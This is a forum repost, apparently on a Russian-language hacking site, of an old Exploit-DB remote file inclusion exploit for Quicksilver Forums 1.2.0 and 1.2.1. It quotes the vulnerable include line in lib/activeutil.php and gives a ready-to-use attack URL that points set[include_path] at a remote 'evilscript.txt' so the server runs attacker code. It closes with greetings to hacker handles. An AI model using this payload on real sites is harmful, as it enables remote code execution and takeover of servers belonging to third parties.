Exploit Quicksilver Forums 1.2.1 - Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
2356
Проверка EDB
  1. Пройдено
Автор
MDX
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-4824
Дата публикации
2006-09-13
Код:
####################################################
#                                                  #
#           [ WWW.SecurityWall.orG ]               #
#                                                  #
####################################################

Quicksilver Forums [(v1.2.0)+(1.2.1)] (set[include_path]) Remote File Inclusion Vulnerabilities

####################################################

Author: mdx

####################################################

Class : Remote

####################################################

cont@ct: bilkopat[at]hotmail[dot]com

####################################################
[v1.2.0]+[v1.2.1]
Code: activeutil.php?

require_once $set['include_path'] . '/lib/bbcode.php';


Exploit:
http://www.site.com/[path]/lib/activeutil.php?set[include_path]=http://site.com/evilscript.txt?

####################################################

Greetz: [Cyber-warrior TIM USERS] , Dreamlord , xoron , The_bat_hacker , redx , dipsomania , Kizil_alev, ElHaCKeR :=)
####################################################

# milw0rm.com [2006-09-13]
 
Источник
www.exploit-db.com

Похожие темы